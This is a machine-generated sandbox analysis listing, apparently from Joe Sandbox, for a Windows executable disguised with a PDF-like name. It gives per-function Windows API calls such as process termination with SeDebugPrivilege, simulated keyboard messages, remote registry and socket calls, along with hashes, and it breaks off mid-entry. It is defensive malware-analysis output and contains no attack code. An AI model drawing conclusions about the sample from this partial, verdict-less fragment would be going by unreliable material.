                                                    • Instruction ID: b409f9a5feed45ed348b3fe8d96d162c6c4283995d6df73253c9d81ae0271178
                                                    • Opcode Fuzzy Hash: 8e7786b734be4175496fcc1418076832c678c136d29933a33ecc2a445feff375
                                                    • Instruction Fuzzy Hash: DCC18F355043419FCB66EF24C941AAAB7E4FF85350F00492DF9999F2A2DB70ED05CB82
                                                    Function 003A9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003A9B19
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 003A9B2D
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003A9B47
                                                    • _wcscat.LIBCMT ref: 003A9BA2
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 003A9BB9
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003A9BE7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: SysListView32
                                                    • API String ID: 307300125-78025650
                                                    • Opcode ID: 44c146abe3839e6b23257104522742517474a18e507ffa9e0ccc8d7ff41e799d
                                                    • Instruction ID: 79ecea70f87bd235182e258294422b9bff3da515ebbab8c473e112738c4eacbe
                                                    • Opcode Fuzzy Hash: 44c146abe3839e6b23257104522742517474a18e507ffa9e0ccc8d7ff41e799d
                                                    • Instruction Fuzzy Hash: FD41AF71940308AFDB229FA4DC85FEE77A8EF09350F11452AF689EB291D7719D84CB60
                                                    Function 003A172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00386532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00386554
                                                      • Part of subcall function 00386532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00386564
                                                      • Part of subcall function 00386532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003865F9
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003A179A
                                                    • GetLastError.KERNEL32 ref: 003A17AD
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003A17D9
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 003A1855
                                                    • GetLastError.KERNEL32(00000000), ref: 003A1860
                                                    • CloseHandle.KERNEL32(00000000), ref: 003A1895
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 2533919879-2896544425
                                                    • Opcode ID: f2994f5a32d92065f44ca3fe6a6bf77d012262e440a2110ac58fa5ec0fb926f7
                                                    • Instruction ID: aacd65a432827568298e8bf195032dff39d469a5fe3427902f5ac52ff7c80a61
                                                    • Opcode Fuzzy Hash: f2994f5a32d92065f44ca3fe6a6bf77d012262e440a2110ac58fa5ec0fb926f7
                                                    • Instruction Fuzzy Hash: CC41E175600200AFDB07EF54CC95FAEB7A9EF45700F098098F9069F2D2DB79A904CB91
                                                    Function 00385819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 003858B8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 770d640ef5a6895fd36a089a30e284d0fbed5b96ab4a56c74786120df363ad00
                                                    • Instruction ID: cd4c58f2df22d6563bb6bec1ba97442e5ff6433f8dda4dd2da6fd2a1e6535985
                                                    • Opcode Fuzzy Hash: 770d640ef5a6895fd36a089a30e284d0fbed5b96ab4a56c74786120df363ad00
                                                    • Instruction Fuzzy Hash: 0011D63670DB46FAE7176B549C83DAB779C9F25724F2000BBF611FA281E7B0AA004765
                                                    Function 0038A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0038A806
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ArraySafeVartype
                                                    • String ID:
                                                    • API String ID: 1725837607-0
                                                    • Opcode ID: e92e22537940b94113a1a16be05ec1dcc99730f38560d078b0c93966a21d2f17
                                                    • Instruction ID: 5977617bff30cc6dcb5251928ca2f84f36160dde4de5abcffe1bb1a914fd2ea8
                                                    • Opcode Fuzzy Hash: e92e22537940b94113a1a16be05ec1dcc99730f38560d078b0c93966a21d2f17
                                                    • Instruction Fuzzy Hash: 26C1B175904709DFEB06EF94C481BAEB7F4FF08315F2440AAE605EB251D734AA46CB91
                                                    Function 00386B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00386B63
                                                    • LoadStringW.USER32(00000000), ref: 00386B6A
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00386B80
                                                    • LoadStringW.USER32(00000000), ref: 00386B87
                                                    • _wprintf.LIBCMT ref: 00386BAD
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00386BCB
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 00386BA8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: 85f9dae37007ab0ea2d3a9b4fd683efa84bb345fb9077a8f90f6df0e84c20e8f
                                                    • Instruction ID: fc4b96c33edffe49735f3634cd8fbe2fbd820d49f491060196b8023f3faa00c1
                                                    • Opcode Fuzzy Hash: 85f9dae37007ab0ea2d3a9b4fd683efa84bb345fb9077a8f90f6df0e84c20e8f
                                                    • Instruction Fuzzy Hash: 650136F65002087FE753A7949D89EF7776CD704304F0444A5B745D6041EA74AE858F75
                                                    Function 003A2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003A2BB5,?,?), ref: 003A3C1D
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003A2BF6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharConnectRegistryUpper
                                                    • String ID:
                                                    • API String ID: 2595220575-0
                                                    • Opcode ID: ded6f493293875803a31399d70b8555517ecc1c5b51f068309f98245e33a2584
                                                    • Instruction ID: 410f514dd05c71118c41fd6568d337f6bb0f0ebe393afd97f0927446f033f5a0
                                                    • Opcode Fuzzy Hash: ded6f493293875803a31399d70b8555517ecc1c5b51f068309f98245e33a2584
                                                    • Instruction Fuzzy Hash: 76916B752042019FCB12EF58C891F6EB7E5FF89310F04885DF9A69B2A2DB34E945CB42
                                                    Function 0039961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • select.WSOCK32 ref: 00399691
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 0039969E
                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003996C8
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003996E9
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 003996F8
                                                    • inet_ntoa.WSOCK32(?), ref: 00399765
                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 003997AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$htonsinet_ntoaselect
                                                    • String ID:
                                                    • API String ID: 500251541-0
                                                    • Opcode ID: c37a3ac468bc2f3881ee56e51d1d37cbfca527863a28730e8ce401cdacf22120
                                                    • Instruction ID: e93d4ebc2a95d7c33b697ec605d43ce6d3973ecf4c8d0c77c660ab26bd884b8a
                                                    • Opcode Fuzzy Hash: c37a3ac468bc2f3881ee56e51d1d37cbfca527863a28730e8ce401cdacf22120
                                                    • Instruction Fuzzy Hash: 1A719C71508200ABDB16EF68CC85F6BB7E8EF85714F104A2EF5559F1A1DB70E904CB62
                                                    Function 0036A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __mtinitlocknum.LIBCMT ref: 0036A991
                                                      • Part of subcall function 00367D7C: __FF_MSGBANNER.LIBCMT ref: 00367D91
                                                      • Part of subcall function 00367D7C: __NMSG_WRITE.LIBCMT ref: 00367D98
                                                      • Part of subcall function 00367D7C: __malloc_crt.LIBCMT ref: 00367DB8
                                                    • __lock.LIBCMT ref: 0036A9A4
                                                    • __lock.LIBCMT ref: 0036A9F0
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,003F6DE0,00000018,00375E7B,?,00000000,00000109), ref: 0036AA0C
                                                    • EnterCriticalSection.KERNEL32(8000000C,003F6DE0,00000018,00375E7B,?,00000000,00000109), ref: 0036AA29
                                                    • LeaveCriticalSection.KERNEL32(8000000C), ref: 0036AA39
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                    • String ID:
                                                    • API String ID: 1422805418-0
                                                    • Opcode ID: e0ab3edc8c43907d2f33b06b434f292d5e55c3ab4de5f18e361908b8eda3952a
                                                    • Instruction ID: e0ca0c807c07a164c1661d28779e29abdac6ff789007167ccfcaa95ee439b6c3
                                                    • Opcode Fuzzy Hash: e0ab3edc8c43907d2f33b06b434f292d5e55c3ab4de5f18e361908b8eda3952a
                                                    • Instruction Fuzzy Hash: 364149B1900A059BEB129FA8CA4575CBBB4AF01335F21C32EE525BF2D5D7749840CF96
                                                    Function 003A8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 003A8EE4
                                                    • GetDC.USER32(00000000), ref: 003A8EEC
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003A8EF7
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 003A8F03
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 003A8F3F
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003A8F50
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003ABD19,?,?,000000FF,00000000,?,000000FF,?), ref: 003A8F8A
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003A8FAA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: 8a1a55ab1280c93704f44b365ba558e28cf1ad057ab16dee2f3044e1253f3344
                                                    • Instruction ID: b206bb6dbb6d188f0b53b1e9b5e8c75acc8f36745433df90ea34951723a39609
                                                    • Opcode Fuzzy Hash: 8a1a55ab1280c93704f44b365ba558e28cf1ad057ab16dee2f3044e1253f3344
                                                    • Instruction Fuzzy Hash: 4031AE72200214BFEB128F54DC4AFEB3BADEF4A715F054065FE48DA291CAB5A841CB70
                                                    Function 003B0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                                    • GetSystemMetrics.USER32(0000000F), ref: 003B016D
                                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 003B038D
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003B03AB
                                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 003B03D6
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003B03FF
                                                    • ShowWindow.USER32(00000003,00000000), ref: 003B0421
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 003B0440
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                    • String ID:
                                                    • API String ID: 3356174886-0
                                                    • Opcode ID: ae9dd47c9639facc13fbf931b3f62f151290bd194072636fe0aa1c6efb8bbc12
                                                    • Instruction ID: c01eec2ebe2ba0c71bd9039dc9187c5fb1d71350d0a1cea9bbcf3af9e8da6964
                                                    • Opcode Fuzzy Hash: ae9dd47c9639facc13fbf931b3f62f151290bd194072636fe0aa1c6efb8bbc12
                                                    • Instruction Fuzzy Hash: 40A1AE35600616EFDB1ACF68C9897EEBBB5BF04704F058125EE58AB690D734AD60CB90
                                                    Function 0035AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 55cc2250cbd13761c55aa1a1bfcde17e7f782a4c020552638347ae47696871de
                                                    • Instruction ID: 671e163fdfae88fdca0bf13dcea2d25f5dc2676f407ef60f8452ce6ccdb4c3cb
                                                    • Opcode Fuzzy Hash: 55cc2250cbd13761c55aa1a1bfcde17e7f782a4c020552638347ae47696871de
                                                    • Instruction Fuzzy Hash: F0717C70900509EFCB06CF98CC49EEEBB78FF85315F148259F915AB261C330AA15DB61
                                                    Function 003A2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 003A225A
                                                    • _memset.LIBCMT ref: 003A2323
                                                    • ShellExecuteExW.SHELL32(?), ref: 003A2368
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                      • Part of subcall function 0035C6F4: _wcscpy.LIBCMT ref: 0035C717
                                                    • CloseHandle.KERNEL32(00000000), ref: 003A242F
                                                    • FreeLibrary.KERNEL32(00000000), ref: 003A243E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                    • String ID: @
                                                    • API String ID: 4082843840-2766056989
                                                    • Opcode ID: f40a897845cd8b1fd11958b55f7c1a7e3cf63ebce341cf0eb5da022310f3b9b0
                                                    • Instruction ID: 5079938de42c4fbd11d3a2c863e3969c2ce58249d2e5e01c407536ef24a0aaa3
                                                    • Opcode Fuzzy Hash: f40a897845cd8b1fd11958b55f7c1a7e3cf63ebce341cf0eb5da022310f3b9b0
                                                    • Instruction Fuzzy Hash: 59716174A006199FCF16EF98C8819AEB7F5FF49310F118459E856AF3A1DB34AD40CB90
                                                    Function 00383DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(?), ref: 00383DE7
                                                    • GetKeyboardState.USER32(?), ref: 00383DFC
                                                    • SetKeyboardState.USER32(?), ref: 00383E5D
                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 00383E8B
                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 00383EAA
                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 00383EF0
                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00383F13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 47fd8f833a1a67be70eb87bcb22ebb1e21f8c20bdf188542e632591ac82e42d9
                                                    • Instruction ID: 8483933eeb60e07cead857a79932aa283c8e298151f4f2f26c4bf91d54d34fc4
                                                    • Opcode Fuzzy Hash: 47fd8f833a1a67be70eb87bcb22ebb1e21f8c20bdf188542e632591ac82e42d9
                                                    • Instruction Fuzzy Hash: 8E51F4A1A047D53EFB3763348C45BBA7EA95B06B04F0944C8F1D58A9C2D3E8AEC8D750
                                                    Function 00383BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32(00000000), ref: 00383C02
                                                    • GetKeyboardState.USER32(?), ref: 00383C17
                                                    • SetKeyboardState.USER32(?), ref: 00383C78
                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00383CA4
                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00383CC1
                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00383D05
                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00383D26
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$Parent
                                                    • String ID:
                                                    • API String ID: 87235514-0
                                                    • Opcode ID: 01c66fbb498d5497f832225bdb6ed5e8a29cf276e6ef2cd95ca871487bfcba3b
                                                    • Instruction ID: 9c0e800cc63808eb2ec60b98ce259b3c2d92f8e43fab9d7b3d86911d72da8206
                                                    • Opcode Fuzzy Hash: 01c66fbb498d5497f832225bdb6ed5e8a29cf276e6ef2cd95ca871487bfcba3b
                                                    • Instruction Fuzzy Hash: 315107A05047D53DFB33A7748C55BB6BFA96B06B00F0884C8E0D55AAC2D294EE98E760
                                                    Function 00387DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
